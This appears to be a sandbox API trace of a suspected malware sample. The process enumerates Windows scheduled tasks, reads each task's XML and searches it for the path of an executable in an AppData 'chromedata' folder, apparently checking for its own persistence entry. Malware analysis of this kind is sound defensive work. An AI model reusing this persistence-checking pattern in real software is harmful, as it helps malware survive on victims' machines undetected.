	[0099.783] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\nettrace.dll,-6910)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\nettrace.dll,-6911)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\nettrace.dll,-6912)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers />\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command>\r\n      <WorkingDirectory>$(Arg1)</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.800] IUnknown:Release (This=0x63ff68) returned 0x0
	[0099.800] IUnknown:Release (This=0x63fe80) returned 0x0
	[0099.800] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0099.801] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.801] IUnknown:Release (This=0x63fe80) returned 0x0
	[0099.801] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.801] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x13, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.801] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea0) returned 0x0
	[0099.802] IRegisteredTaskCollection:get_Count (in: This=0x63fea0, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0099.802] IUnknown:Release (This=0x63fea0) returned 0x0
	[0099.802] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea0) returned 0x0
	[0099.803] ITaskFolderCollection:get_Count (in: This=0x63fea0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.803] IUnknown:Release (This=0x63fea0) returned 0x0
	[0099.803] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.803] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x14, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.803] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe90) returned 0x0
	[0099.805] IRegisteredTaskCollection:get_Count (in: This=0x63fe90, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0099.805] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0099.805] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="Background Synchronization") returned 0x0
	[0099.805] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Background Synchronization</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT360M</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT60M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.808] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Background Synchronization</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT360M</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT60M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.841] IUnknown:Release (This=0x63ff88) returned 0x0
	[0099.841] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0099.841] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="Logon Synchronization") returned 0x0
	[0099.841] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Logon Synchronization</URI>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT4M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n      <Data><![CDATA[Logon]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.843] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Logon Synchronization</URI>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT4M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n      <Data><![CDATA[Logon]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.867] IUnknown:Release (This=0x63ff88) returned 0x0
	[0099.867] IUnknown:Release (This=0x63fe90) returned 0x0
	[0099.867] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe90) returned 0x0
	[0099.868] ITaskFolderCollection:get_Count (in: This=0x63fe90, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.868] IUnknown:Release (This=0x63fe90) returned 0x0
	[0099.868] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.868] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x15, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.868] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0099.870] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.870] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.870] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="BackgroundConfigSurveyor") returned 0x0
	[0099.870] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%systemRoot%\\System32\\perftrack.dll,-2003)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\perftrack.dll,-2002)</Description>\r\n    <URI>Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <IdleTrigger />\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-05-30T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{EA9155A3-8A39-40b4-8963-D3C761B18371}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.872] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%systemRoot%\\System32\\perftrack.dll,-2003)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\perftrack.dll,-2002)</Description>\r\n    <URI>Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <IdleTrigger />\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-05-30T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{EA9155A3-8A39-40b4-8963-D3C761B18371}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.896] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.896] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.896] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0099.898] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.898] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.898] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.898] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x16, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.898] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe78) returned 0x0
	[0099.899] IRegisteredTaskCollection:get_Count (in: This=0x63fe78, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0099.899] IUnknown:Release (This=0x63fe78) returned 0x0
	[0099.899] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe78) returned 0x0
	[0099.900] ITaskFolderCollection:get_Count (in: This=0x63fe78, pCount=0x128e2c | out: pCount=0x128e2c*=1) returned 0x0
	[0099.900] ITaskFolderCollection:get_Item (in: This=0x63fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128e54 | out: ppFolder=0x128e54*=0x63ff58) returned 0x0
	[0099.901] ITaskFolder:GetTasks (in: This=0x63ff58, flags=1, ppTasks=0x128d28 | out: ppTasks=0x128d28*=0x1690048) returned 0x0
	[0099.901] IRegisteredTaskCollection:get_Count (in: This=0x1690048, pCount=0x128d18 | out: pCount=0x128d18*=0) returned 0x0
	[0099.901] IUnknown:Release (This=0x1690048) returned 0x0
	[0099.901] ITaskFolder:GetFolders (in: This=0x63ff58, flags=0, ppFolders=0x128d1c | out: ppFolders=0x128d1c*=0x1690048) returned 0x0
	[0099.902] ITaskFolderCollection:get_Count (in: This=0x1690048, pCount=0x128d14 | out: pCount=0x128d14*=0) returned 0x0
	[0099.902] IUnknown:Release (This=0x1690048) returned 0x0
	[0099.902] TaskScheduler:IUnknown:Release (This=0x63ff58) returned 0x0
	[0099.902] IUnknown:Release (This=0x63fe78) returned 0x0
	[0099.902] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.902] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x17, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.903] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea8) returned 0x0
	[0099.904] IRegisteredTaskCollection:get_Count (in: This=0x63fea8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.904] IRegisteredTaskCollection:get_Item (in: This=0x63fea8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0099.904] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="AnalyzeSystem") returned 0x0
	[0099.904] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem</URI>\r\n    <Source>$(@%systemRoot%\\system32\\energy.dll,-101)</Source>\r\n    <Author>$(@%systemRoot%\\system32\\energy.dll,-103)</Author>\r\n    <Description>$(@%systemRoot%\\system32\\energy.dll,-102)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T06:00:00</StartBoundary>\r\n      <RandomDelay>PT8H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>14</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <Duration>PT5M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT5M</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\powercfg.exe</Command>\r\n      <Arguments>-energy -auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.907] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem</URI>\r\n    <Source>$(@%systemRoot%\\system32\\energy.dll,-101)</Source>\r\n    <Author>$(@%systemRoot%\\system32\\energy.dll,-103)</Author>\r\n    <Description>$(@%systemRoot%\\system32\\energy.dll,-102)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T06:00:00</StartBoundary>\r\n      <RandomDelay>PT8H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>14</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <Duration>PT5M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT5M</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\powercfg.exe</Command>\r\n      <Arguments>-energy -auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.936] IUnknown:Release (This=0x1690048) returned 0x0
	[0099.936] IUnknown:Release (This=0x63fea8) returned 0x0
	[0099.936] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea8) returned 0x0
	[0099.937] ITaskFolderCollection:get_Count (in: This=0x63fea8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.937] IUnknown:Release (This=0x63fea8) returned 0x0
	[0099.937] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.938] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x18, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.938] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe78) returned 0x0
	[0099.939] IRegisteredTaskCollection:get_Count (in: This=0x63fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
